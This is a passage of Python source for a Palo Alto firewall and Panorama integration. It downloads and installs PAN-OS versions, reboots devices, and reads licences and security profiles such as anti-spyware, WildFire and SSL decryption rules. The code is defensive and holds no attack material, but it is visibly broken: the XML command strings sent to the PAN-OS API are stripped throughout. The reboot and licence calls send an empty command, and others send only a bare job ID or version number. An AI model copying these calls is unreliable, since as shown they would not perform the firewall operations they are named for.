params=params\n )\n return result\n\n\ndef panorama_download_panos_version_command(args: dict):\n \"\"\"\n Check jobID of pan-os version download\n \"\"\"\n if DEVICE_GROUP:\n raise Exception('Downloading PAN-OS version is only supported on Firewall (not Panorama).')\n target = str(args['target']) if 'target' in args else None\n target_version = str(args['target_version'])\n result = panorama_download_panos_version(target, target_version)\n\n if 'result' in result['response']:\n # download has been given a jobid\n panos_version_download = {\n 'JobID': result['response']['result']['job']\n }\n entry_context = {\"Panorama.PANOS.Download(val.JobID == obj.JobID)\": panos_version_download}\n human_readable = tableToMarkdown('Result:', panos_version_download, ['JobID', 'Status'], removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n else:\n # no panos download took place\n return_results(result['response']['msg'])\n\n\n@logger\ndef panorama_download_panos_status(target: str, job_id: str):\n params = {\n 'type': 'op',\n 'cmd': f'{job_id}',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n return result\n\n\ndef panorama_download_panos_status_command(args: dict):\n \"\"\"\n Check jobID of panos download status\n \"\"\"\n if DEVICE_GROUP:\n raise Exception('PAN-OS version download status is only supported on Firewall (not Panorama).')\n target = str(args['target']) if 'target' in args else None\n job_id = args.get('job_id')\n result = panorama_download_panos_status(target, job_id)\n panos_download_status = {\n 'JobID': result['response']['result']['job']['id']\n }\n if result['response']['result']['job']['status'] == 'FIN':\n if result['response']['result']['job']['result'] == 'OK':\n panos_download_status['Status'] = 'Completed'\n else:\n # result['response']['job']['result'] == 'FAIL'\n panos_download_status['Status'] = 'Failed'\n panos_download_status['Details'] = result['response']['result']['job']\n\n if result['response']['result']['job']['status'] == 'PEND':\n panos_download_status['Status'] = 'Pending'\n\n human_readable = tableToMarkdown('PAN-OS download status:', panos_download_status,\n ['JobID', 'Status', 'Details'], removeNull=True)\n entry_context = {\"Panorama.PANOS.Download(val.JobID == obj.JobID)\": panos_download_status}\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n\n\n@logger\ndef panorama_install_panos_version(target: str, target_version: str):\n params = {\n 'type': 'op',\n 'cmd': f'{target_version}'\n '',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n return result\n\n\ndef panorama_install_panos_version_command(args: dict):\n \"\"\"\n Check jobID of panos install\n \"\"\"\n if DEVICE_GROUP:\n raise Exception('PAN-OS installation is only supported on Firewall (not Panorama).')\n target = str(args['target']) if 'target' in args else None\n target_version = str(args['target_version'])\n result = panorama_install_panos_version(target, target_version)\n\n if 'result' in result['response']:\n # panos install has been given a jobid\n panos_install = {\n 'JobID': result['response']['result']['job']\n }\n entry_context = {\"Panorama.PANOS.Install(val.JobID == obj.JobID)\": panos_install}\n human_readable = tableToMarkdown('PAN-OS Installation:', panos_install, ['JobID', 'Status'], removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n else:\n # no panos install took place\n return_results(result['response']['msg'])\n\n\n@logger\ndef panorama_install_panos_status(target: str, job_id: str):\n params = {\n 'type': 'op',\n 'cmd': f'{job_id}',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n return result\n\n\ndef panorama_install_panos_status_command(args: dict):\n \"\"\"\n Check jobID of panos install status\n \"\"\"\n target = str(args['target']) if 'target' in args else None\n job_id = args['job_id']\n result = panorama_install_panos_status(target, job_id)\n\n panos_install_status = {\n 'JobID': result['response']['result']['job']['id']\n }\n if result['response']['result']['job']['status'] == 'FIN':\n if result['response']['result']['job']['result'] == 'OK':\n panos_install_status['Status'] = 'Completed'\n else:\n # result['response']['job']['result'] == 'FAIL'\n panos_install_status['Status'] = 'Failed'\n panos_install_status['Details'] = result['response']['result']['job']\n\n if result['response']['result']['job']['status'] == 'PEND':\n panos_install_status['Status'] = 'Pending'\n\n entry_context = {\"Panorama.PANOS.Install(val.JobID == obj.JobID)\": panos_install_status}\n human_readable = tableToMarkdown('PAN-OS installation status:', panos_install_status,\n ['JobID', 'Status', 'Details'], removeNull=True)\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n\n\ndef panorama_device_reboot_command(target: Optional[str] = None):\n if DEVICE_GROUP:\n raise Exception('Device reboot is only supported on Firewall (not Panorama).')\n params = {\n 'type': 'op',\n 'cmd': '',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n return_results(result['response']['result'])\n\n\n@logger\ndef panorama_show_location_ip(ip_address: str):\n params = {\n 'type': 'op',\n 'cmd': f'{ip_address}',\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n return result\n\n\ndef panorama_show_location_ip_command(ip_address: str):\n \"\"\"\n Check location of a specified ip address\n \"\"\"\n result = panorama_show_location_ip(ip_address)\n\n if 'response' not in result or '@status' not in result['response'] or result['response']['@status'] != 'success':\n raise Exception(f'Failed to successfully show the location of the specified ip: {ip_address}.')\n\n if 'response' in result and 'result' in result['response'] and 'entry' in result['response']['result']:\n entry = result['response']['result']['entry']\n show_location_output = {\n \"ip_address\": entry.get('ip'),\n \"country_name\": entry.get('country'),\n \"country_code\": entry.get('@cc'),\n \"status\": 'Found'\n }\n else:\n show_location_output = {\n \"ip_address\": ip_address,\n \"status\": 'NotFound'\n }\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown(f'IP {ip_address} location:', show_location_output,\n ['ip_address', 'country_name', 'country_code', 'result'], removeNull=True),\n 'EntryContext': {\"Panorama.Location.IP(val.ip_address == obj.ip_address)\": show_location_output}\n })\n\n\n@logger\ndef panorama_get_license() -> Dict:\n params = {\n 'type': 'op',\n 'cmd': '',\n 'key': API_KEY\n }\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef panorama_get_license_command():\n \"\"\"\n Get information about PAN-OS available licenses and their statuses.\n \"\"\"\n available_licences = []\n result = panorama_get_license()\n if 'response' not in result or '@status' not in result['response'] or result['response']['@status'] != 'success':\n demisto.debug(str(result))\n raise Exception('Failed to get the information about PAN-OS available licenses and their statuses.')\n\n entry = result.get('response', {}).get('result', {}).get('licenses', {}).get('entry', [])\n for item in entry:\n available_licences.append({\n 'Authcode': item.get('authcode'),\n 'Base-license-name': item.get('base-license-name'),\n 'Description': item.get('description'),\n 'Expired': item.get('expired'),\n 'Feature': item.get('feature'),\n 'Expires': item.get('expires'),\n 'Issued': item.get('issued'),\n 'Serial': item.get('serial')\n })\n\n headers = ['Authcode', 'Base-license-name', 'Description', 'Feature', 'Serial', 'Expired', 'Expires', 'Issued']\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('PAN-OS Available Licenses', available_licences, headers, removeNull=True),\n 'EntryContext': {\"Panorama.License(val.Feature == obj.Feature)\": available_licences}\n })\n\n\ndef prettify_data_filtering_rule(rule: Dict) -> Dict:\n \"\"\"\n Prettify the data filtering rule to be compatible to our standard.\n Args:\n rule: The profile rule to prettify\n\n Returns: rule dictionary compatible to our standards.\n\n \"\"\"\n pretty_rule = {\n 'Name': rule.get('@name')\n }\n if 'application' in rule and 'member' in rule['application']:\n pretty_rule['Application'] = rule['application']['member']\n if 'file-type' in rule and 'member' in rule['file-type']:\n pretty_rule['File-type'] = rule['file-type']['member']\n if 'direction' in rule:\n pretty_rule['Direction'] = rule['direction']\n if 'alert-threshold' in rule:\n pretty_rule['Alert-threshold'] = rule['alert-threshold']\n if 'block-threshold' in rule:\n pretty_rule['Block-threshold'] = rule['block-threshold']\n if 'data-object' in rule:\n pretty_rule['Data-object'] = rule['data-object']\n if 'log-severity' in rule:\n pretty_rule['Log-severity'] = rule['log-severity']\n if 'description' in rule:\n pretty_rule['Description'] = rule['description']\n\n return pretty_rule\n\n\ndef prettify_data_filtering_rules(rules: Dict) -> List:\n \"\"\"\n\n Args:\n rules: All the rules to prettify\n\n Returns: A list of all the rules compatible with our standards.\n\n \"\"\"\n if not isinstance(rules, list):\n return [prettify_data_filtering_rule(rules)]\n return [prettify_data_filtering_rule(rule) for rule in rules]\n\n\n@logger\ndef get_security_profile(xpath: str) -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': xpath,\n 'key': API_KEY\n }\n\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef get_security_profiles_command(security_profile: str = None):\n \"\"\"\n Get information about profiles.\n \"\"\"\n if security_profile:\n xpath = f'{XPATH_RULEBASE}profiles/{security_profile}'\n else:\n xpath = f'{XPATH_RULEBASE}profiles'\n\n result = get_security_profile(xpath)\n if security_profile:\n security_profiles = result.get('response', {}).get('result', {})\n else:\n security_profiles = result.get('response', {}).get('result', {}).get('profiles', {})\n\n if '@dirtyId' in security_profiles:\n demisto.debug(f'Found uncommitted item:\\n{security_profiles}')\n raise Exception('Please commit the instance prior to getting the security profiles.')\n\n human_readable = ''\n context = {}\n if 'spyware' in security_profiles and security_profiles['spyware'] is not None:\n spyware_content = []\n profiles = security_profiles.get('spyware', {}).get('entry', {})\n if isinstance(profiles, list):\n for profile in profiles:\n rules = profile.get('rules', {}).get('entry', [])\n spyware_rules = prettify_profiles_rules(rules)\n spyware_content.append({\n 'Name': profile['@name'],\n 'Rules': spyware_rules\n })\n else:\n rules = profiles.get('rules', {}).get('entry', [])\n spyware_rules = prettify_profiles_rules(rules)\n spyware_content = [{\n 'Name': profiles['@name'],\n 'Rules': spyware_rules\n }]\n\n human_readable = tableToMarkdown('Anti Spyware Profiles', spyware_content)\n context.update({\"Panorama.Spyware(val.Name == obj.Name)\": spyware_content})\n\n if 'virus' in security_profiles and security_profiles['virus'] is not None:\n virus_content = []\n profiles = security_profiles.get('virus', {}).get('entry', [])\n if isinstance(profiles, list):\n for profile in profiles:\n rules = profile.get('decoder', {}).get('entry', [])\n antivirus_rules = prettify_profiles_rules(rules)\n virus_content.append({\n 'Name': profile['@name'],\n 'Decoder': antivirus_rules\n })\n else:\n rules = profiles.get('decoder', {}).get('entry', [])\n antivirus_rules = prettify_profiles_rules(rules)\n virus_content = [{\n 'Name': profiles['@name'],\n 'Rules': antivirus_rules\n }]\n\n human_readable += tableToMarkdown('Antivirus Profiles', virus_content, headers=['Name', 'Decoder', 'Rules'],\n removeNull=True)\n context.update({\"Panorama.Antivirus(val.Name == obj.Name)\": virus_content})\n\n if 'file-blocking' in security_profiles and security_profiles['file-blocking'] is not None:\n file_blocking_content = []\n profiles = security_profiles.get('file-blocking', {}).get('entry', {})\n if isinstance(profiles, list):\n for profile in profiles:\n rules = profile.get('rules', {}).get('entry', [])\n file_blocking_rules = prettify_profiles_rules(rules)\n file_blocking_content.append({\n 'Name': profile['@name'],\n 'Rules': file_blocking_rules\n })\n else:\n rules = profiles.get('rules', {}).get('entry', [])\n file_blocking_rules = prettify_profiles_rules(rules)\n file_blocking_content = [{\n 'Name': profiles['@name'],\n 'Rules': file_blocking_rules\n }]\n\n human_readable += tableToMarkdown('File Blocking Profiles', file_blocking_content)\n context.update({\"Panorama.FileBlocking(val.Name == obj.Name)\": file_blocking_content})\n\n if 'vulnerability' in security_profiles and security_profiles['vulnerability'] is not None:\n vulnerability_content = []\n profiles = security_profiles.get('vulnerability', {}).get('entry', {})\n if isinstance(profiles, list):\n for profile in profiles:\n rules = profile.get('rules', {}).get('entry', [])\n vulnerability_rules = prettify_profiles_rules(rules)\n vulnerability_content.append({\n 'Name': profile['@name'],\n 'Rules': vulnerability_rules\n })\n else:\n rules = profiles.get('rules', {}).get('entry', [])\n vulnerability_rules = prettify_profiles_rules(rules)\n vulnerability_content = [{\n 'Name': profiles['@name'],\n 'Rules': vulnerability_rules\n }]\n\n human_readable += tableToMarkdown('Vulnerability Protection Profiles', vulnerability_content)\n context.update({\"Panorama.Vulnerability(val.Name == obj.Name)\": vulnerability_content})\n\n if 'data-filtering' in security_profiles and security_profiles['data-filtering'] is not None:\n data_filtering_content = []\n profiles = security_profiles.get('data-filtering', {}).get('entry', {})\n if isinstance(profiles, list):\n for profile in profiles:\n rules = profile.get('rules', {}).get('entry', [])\n data_filtering_rules = prettify_data_filtering_rules(rules)\n data_filtering_content.append({\n 'Name': profile['@name'],\n 'Rules': data_filtering_rules\n })\n else:\n rules = profiles.get('rules', {}).get('entry', [])\n data_filtering_rules = prettify_data_filtering_rules(rules)\n data_filtering_content = [{\n 'Name': profiles['@name'],\n 'Rules': data_filtering_rules\n }]\n\n human_readable += tableToMarkdown('Data Filtering Profiles', data_filtering_content)\n context.update({\"Panorama.DataFiltering(val.Name == obj.Name)\": data_filtering_content})\n\n if 'url-filtering' in security_profiles and security_profiles['url-filtering'] is not None:\n url_filtering_content = []\n profiles = security_profiles.get('url-filtering', {}).get('entry', {})\n if isinstance(profiles, list):\n for profile in profiles:\n url_filtering_rules = prettify_get_url_filter(profile)\n url_filtering_content.append({\n 'Name': profile['@name'],\n 'Rules': url_filtering_rules\n })\n else:\n url_filtering_rules = prettify_get_url_filter(profiles)\n url_filtering_content = [{\n 'Name': profiles['@name'],\n 'Rules': url_filtering_rules\n }]\n\n human_readable += tableToMarkdown('URL Filtering Profiles', url_filtering_content)\n context.update({'Panorama.URLFilter(val.Name == obj.Name)': url_filtering_content})\n\n if 'wildfire-analysis' in security_profiles and security_profiles['wildfire-analysis'] is not None:\n wildfire_analysis_content = []\n profiles = security_profiles.get('wildfire-analysis', {}).get('entry', [])\n if isinstance(profiles, list):\n for profile in profiles:\n rules = profile.get('rules', {}).get('entry', [])\n wildfire_rules = prettify_wildfire_rules(rules)\n wildfire_analysis_content.append({\n 'Name': profile['@name'],\n 'Rules': wildfire_rules\n })\n else:\n rules = profiles.get('rules', {}).get('entry', [])\n wildfire_rules = prettify_wildfire_rules(rules)\n wildfire_analysis_content = [{\n 'Name': profiles['@name'],\n 'Rules': wildfire_rules\n }]\n\n human_readable += tableToMarkdown('WildFire Profiles', wildfire_analysis_content)\n context.update({\"Panorama.WildFire(val.Name == obj.Name)\": wildfire_analysis_content})\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': context\n })\n\n\n@logger\ndef apply_security_profile(xpath: str, profile_name: str) -> Dict:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': xpath,\n 'key': API_KEY,\n 'element': f'{profile_name}'\n }\n result = http_request(URL, 'POST', params=params)\n\n return result\n\n\ndef apply_security_profile_command(profile_name: str, profile_type: str, rule_name: str, pre_post: str = None):\n if DEVICE_GROUP: # Panorama instance\n if not pre_post:\n raise Exception('Please provide the pre_post argument when applying profiles to rules in '\n 'Panorama instance.')\n xpath = f\"{XPATH_RULEBASE}{pre_post}/security/rules/entry[@name='{rule_name}']/profile-setting/\" \\\n f\"profiles/{profile_type}\"\n\n else: # firewall instance\n xpath = f\"{XPATH_RULEBASE}rulebase/security/rules/entry[@name='{rule_name}']/profile-setting/\" \\\n f\"profiles/{profile_type}\"\n\n apply_security_profile(xpath, profile_name)\n return_results(f'The profile {profile_name} has been applied to the rule {rule_name}')\n\n\n@logger\ndef get_ssl_decryption_rules(xpath: str) -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': xpath,\n 'key': API_KEY\n }\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef get_ssl_decryption_rules_command(pre_post: str):\n content = []\n if DEVICE_GROUP:\n if not pre_post:\n raise Exception('Please provide the pre_post argument when getting rules in Panorama instance.')\n else:\n xpath = XPATH_RULEBASE + pre_post + '/decryption/rules'\n else:\n xpath = XPATH_RULEBASE\n result = get_ssl_decryption_rules(xpath)\n ssl_decryption_rules = result.get('response', {}).get('result', {}).get('rules', {}).get('entry')\n if '@dirtyId' in ssl_decryption_rules:\n demisto.debug(f'Found uncommitted item:\\n{ssl_decryption_rules}')\n raise Exception('Please commit the instance prior to getting the ssl decryption rules.')\n if isinstance(ssl_decryption_rules, list):\n for item in ssl_decryption_rules:\n content.append({\n 'Name': item.get('@name'),\n 'UUID': item.get('@uuid'),\n 'Target': item.get('target'),\n 'Category': item.get('category'),\n 'Service': item.get('service', {}).get('member'),\n 'Type': item.get('type'),\n 'From': item.get('from').get('member'),\n 'To': item.get('to').get('member'),\n 'Source': item.get('source').get('member'),\n 'Destination': item.get('destination', {}).get('member'),\n 'Source-user': item.get('source-user', {}).get('member'),\n 'Action': item.get('action'),\n 'Description': item.get('description')\n })\n else:\n content = [{\n 'Name': ssl_decryption_rules.get('@name'),\n 'UUID': ssl_decryption_rules.get('@uuid'),\n 'Target': ssl_decryption_rules.get('target'),\n 'Category': ssl_decryption_rules.get('category'),\n 'Service': ssl_decryption_rules.get('service', {}).get('member'),\n 'Type': ssl_decryption_rules.get('type'),\n 'From': ssl_decryption_rules.get('from').get('member'),\n 'To': ssl_decryption_rules.get('to').get('member'),\n 'Source': ssl_decryption_rules.get('source').get('member'),\n 'Destination': ssl_decryption_rules.get('destination', {}).get('member'),\n 'Source-user': ssl_decryption_rules.get('source-user', {}).get('member'),\n 'Action': ssl_decryption_rules.get('action'),\n 'Description': ssl_decryption_rules.get('description')\n }]\n\n headers = ['Name', 'UUID', 'Description', 'Target', 'Service', 'Category', 'Type', 'From', 'To', 'Source',\n 'Destination', 'Action', 'Source-user']\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('SSL Decryption Rules', content, headers, removeNull=True),\n 'EntryContext': {\"Panorama.SSLRule(val.UUID == obj.UUID)\": content}\n })\n\n\ndef prettify_profile_rule(rule: Dict) -> Dict:\n \"\"\"\n Args:\n rule: The rule dictionary.\n\n Returns: Dictionary of the rule compatible with our standards.\n\n \"\"\"\n pretty_rule = {\n 'Name': rule['@name'],\n 'Action': rule['action']\n }\n if 'application' in rule and 'member' in rule['application']:\n pretty_rule['Application'] = rule['application']['member']\n if 'file-type' in rule and 'member' in rule['file-type']:\n pretty_rule['File-type'] = rule['file-type']['member']\n if 'wildfire-action' in rule:\n pretty_rule['WildFire-action'] = rule['wildfire-action']\n if 'category' in rule and 'member' in rule['category']:\n pretty_rule['Category'] = rule['category']['member']\n elif 'category' in rule:\n pretty_rule['Category'] = rule['category']\n if 'severity' in rule and 'member' in rule['severity']:\n pretty_rule['Severity'] = rule['severity']['member']\n if 'threat-name' in rule and 'member' in rule['threat-name']:\n pretty_rule['Threat-name'] = rule['threat-name']['member']\n elif 'threat-name' in rule:\n pretty_rule['Threat-name'] = rule['threat-name']\n if 'packet-capture' in rule:\n pretty_rule['Packet-capture'] = rule['packet-capture']\n if '@maxver' in rule:\n pretty_rule['Max_version'] = rule['@maxver']\n if 'sinkhole' in rule:\n pretty_rule['Sinkhole'] = {}\n if 'ipv4-address' in rule['sinkhole']:\n pretty_rule['Sinkhole']['IPV4'] = rule['sinkhole']['ipv4-address']\n if 'ipv6-address' in rule['sinkhole']:\n pretty_rule['Sinkhole']['IPV6'] = rule['sinkhole']['ipv6-address']\n if 'host' in rule:\n pretty_rule['Host'] = rule['host']\n if 'cve' in rule and 'member' in rule['cve']:\n pretty_rule['CVE'] = rule['cve']['member']\n if 'vendor-id' in rule and 'member' in rule['vendor-id']:\n pretty_rule['Vendor-id'] = rule['vendor-id']['member']\n if 'analysis' in rule:\n pretty_rule['Analysis'] = rule['analysis']\n return pretty_rule\n\n\ndef prettify_profiles_rules(rules: Dict) -> List:\n \"\"\"\n Args:\n rules: The rules to prettify.\n\n Returns: List with the rules that are compatible to our standard.\n\n \"\"\"\n if not isinstance(rules, list):\n return [prettify_profile_rule(rules)]\n pretty_rules_arr = []\n for rule in rules:\n pretty_rule = prettify_profile_rule(rule)\n pretty_rules_arr.append(pretty_rule)\n\n return pretty_rules_arr\n\n\n@logger\ndef get_anti_spyware_best_practice() -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': '/config/predefined/profiles/spyware',\n 'key': API_KEY\n }\n\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef get_anti_spyware_best_practice_command():\n result = get_anti_spyware_best_practice()\n spyware_profile = result.get('response', {}).get('result', {}).get('spyware').get('entry', [])\n strict_profile = next(item for item in spyware_profile if item['@name'] == 'strict')\n\n botnet_domains = strict_profile.get('botnet-domains', {}).get('lists', {}).get('entry', [])\n pretty_botnet_domains = prettify_profiles_rules(botnet_domains)\n\n sinkhole = strict_profile.get('botnet-domains', {}).get('sinkhole', {})\n sinkhole_content = []\n if sinkhole:\n sinkhole_content = [\n {'ipv6-address': sinkhole['ipv6-address'], 'ipv4-address': sinkhole['ipv4-address']}\n ]\n\n botnet_output = pretty_botnet_domains + sinkhole_content\n\n human_readable = tableToMarkdown('Anti Spyware Botnet-Domains Best Practice', botnet_output,\n ['Name', 'Action', 'Packet-capture', 'ipv4-address', 'ipv6-address'],\n removeNull=True)\n\n rules = strict_profile.get('rules', {}).get('entry')\n profile_rules = prettify_profiles_rules(rules)\n human_readable += tableToMarkdown('Anti Spyware Best Practice Rules', profile_rules,\n ['Name', 'Severity', 'Action', 'Category', 'Threat-name'], removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': strict_profile,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\n 'Panorama.Spyware.Rule(val.Name == obj.Name)': profile_rules,\n 'Panorama.Spyware.BotentDomain(val.Name == obj.Name)': pretty_botnet_domains,\n 'Panorama.Spyware.BotentDomain.Sinkhole(val.ipv4-address == obj.ipv4-address)': sinkhole_content\n }\n })\n\n\n@logger\ndef get_file_blocking_best_practice() -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': '/config/predefined/profiles/file-blocking',\n 'key': API_KEY\n }\n\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef get_file_blocking_best_practice_command():\n results = get_file_blocking_best_practice()\n file_blocking_profile = results.get('response', {}).get('result', {}).get('file-blocking', {}).get('entry', [])\n\n strict_profile = next(item for item in file_blocking_profile if item['@name'] == 'strict file blocking')\n file_blocking_rules = strict_profile.get('rules', {}).get('entry', [])\n\n rules = prettify_profiles_rules(file_blocking_rules)\n human_readable = tableToMarkdown('File Blocking Profile Best Practice', rules,\n ['Name', 'Action', 'File-type', 'Application'], removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': strict_profile,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\n 'Panorama.FileBlocking.Rule(val.Name == obj.Name)': rules,\n }\n })\n\n\n@logger\ndef get_antivirus_best_practice() -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': '/config/predefined/profiles/virus',\n 'key': API_KEY\n }\n\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef get_antivirus_best_practice_command():\n results = get_antivirus_best_practice()\n antivirus_profile = results.get('response', {}).get('result', {}).get('virus', {})\n strict_profile = antivirus_profile.get('entry', {})\n antivirus_rules = strict_profile.get('decoder', {}).get('entry', [])\n\n rules = prettify_profiles_rules(antivirus_rules)\n human_readable = tableToMarkdown('Antivirus Best Practice Profile', rules, ['Name', 'Action', 'WildFire-action'],\n removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': strict_profile,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\n 'Panorama.Antivirus.Decoder(val.Name == obj.Name)': rules,\n }\n })\n\n\n@logger\ndef get_vulnerability_protection_best_practice() -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': '/config/predefined/profiles/vulnerability',\n 'key': API_KEY\n }\n\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef get_vulnerability_protection_best_practice_command():\n results = get_vulnerability_protection_best_practice()\n vulnerability_protection = results.get('response', {}).get('result', {}).get('vulnerability', {}).get('entry', [])\n strict_profile = next(item for item in vulnerability_protection if item['@name'] == 'strict')\n vulnerability_rules = strict_profile.get('rules', {}).get('entry', [])\n rules = prettify_profiles_rules(vulnerability_rules)\n human_readable = tableToMarkdown('vulnerability Protection Best Practice Profile', rules,\n ['Name', 'Action', 'Host', 'Severity', 'Category', 'Threat-name', 'CVE',\n 'Vendor-id'], removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': strict_profile,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\n 'Panorama.Vulnerability.Rule(val.Name == obj.Name)': rules,\n }\n })\n\n\n@logger\ndef get_wildfire_best_practice() -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': '/config/predefined/profiles/wildfire-analysis',\n 'key': API_KEY\n }\n\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef prettify_wildfire_rule(rule: Dict) -> Dict:\n \"\"\"\n Args:\n rule: The profile security rule to prettify.\n\n Returns: The rule dict compatible with our standard.\n\n \"\"\"\n pretty_rule = {\n 'Name': rule['@name'],\n }\n if 'application' in rule and 'member' in rule['application']:\n pretty_rule['Application'] = rule['application']['member']\n if 'file-type' in rule and 'member' in rule['file-type']:\n pretty_rule['File-type'] = rule['file-type']['member']\n if 'analysis' in rule:\n pretty_rule['Analysis'] = rule['analysis']\n\n return pretty_rule\n\n\ndef prettify_wildfire_rules(rules: Dict) -> List:\n \"\"\"\n Args:\n rules: WildFire rules to prettify.\n\n Returns: List of the rules that are compatible to our standard.\n\n \"\"\"\n if not isinstance(rules, list):\n return [prettify_wildfire_rule(rules)]\n pretty_rules_arr = []\n for rule in rules:\n pretty_rule = prettify_wildfire_rule(rule)\n pretty_rules_arr.append(pretty_rule)\n\n return pretty_rules_arr\n\n\ndef get_wildfire_best_practice_command():\n result = get_wildfire_best_practice()\n wildfire_profile = result.get('response', {}).get('result', {}).get('wildfire-analysis', {})\n best_practice = wildfire_profile.get('entry', {}).get('rules', {}).get('entry', {})\n\n rules = prettify_wildfire_rules(best_practice)\n wildfire_schedule = {\n 'Recurring': 'every-minute',\n 'Action': 'download-and-install'\n }\n ssl_decrypt_settings = {'allow-forward-decrypted-content': 'yes'}\n system_settings = [\n {'Name': 'pe', 'File-size': '10'},\n {'Name': 'apk', 'File-size': '30'},\n {'Name': 'pdf', 'File-size': '1000'},\n {'Name': 'ms-office', 'File-size': '2000'},\n {'Name': 'jar', 'File-size': '5'},\n {'Name': 'flash', 'File-size': '5'},\n {'Name': 'MacOS', 'File-size': '1'},\n {'Name': 'archive', 'File-size': '10'},\n {'Name': 'linux', 'File-size': '2'},\n {'Name': 'script', 'File-size': '20'}\n ]\n\n human_readable = tableToMarkdown('WildFire Best Practice Profile', rules, ['Name', 'Analysis', 'Application',\n 'File-type'], removeNull=True)\n human_readable += tableToMarkdown('Wildfire Best Practice Schedule', wildfire_schedule)\n human_readable += tableToMarkdown('Wildfire SSL Decrypt Settings', ssl_decrypt_settings)\n human_readable += tableToMarkdown('Wildfire System Settings\\n report-grayware-file: yes', system_settings,\n ['Name', 'File-size'])\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': wildfire_profile,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\n 'Panorama.WildFire': rules,\n 'Panorama.WildFire.File(val.Name == obj.Name)': system_settings,\n 'Panorama.WildFire.Schedule': wildfire_schedule,\n 'Panorama.WildFire.SSLDecrypt': ssl_decrypt_settings\n }\n })\n\n\ndef set_xpath_wildfire(template: str = None) -> str:\n \"\"\"\n Setting wildfire xpath relevant to panorama instances.\n \"\"\"\n if template:\n xpath_wildfire = f\"/config/devices/entry[@name='localhost.localdomain']/template/entry[@name=\" \\\n f\"'{template}']/config/devices/entry[@name='localhost.localdomain']/deviceconfig/setting/wildfire\"\n\n else:\n xpath_wildfire = \"/config/devices/entry[@name='localhost.localdomain']/deviceconfig/setting\"\n return xpath_wildfire\n\n\n@logger\ndef get_wildfire_system_config(template: str) -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': set_xpath_wildfire(template),\n 'key': API_KEY,\n }\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\n@logger\ndef get_wildfire_update_schedule(template: str) -> Dict:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': f\"/config/devices/entry[@name='localhost.localdomain']/template/entry[@name='{template}']\"\n f\"/config/devices/entry[@name='localhost.localdomain']/deviceconfig/system/update-schedule/wildfire\",\n 'key': API_KEY\n }\n result = http_request(URL, 'GET', params=params)\n\n return result\n\n\ndef get_wildfire_configuration_command(template: str):\n file_size = []\n result = get_wildfire_system_config(template)\n system_config = 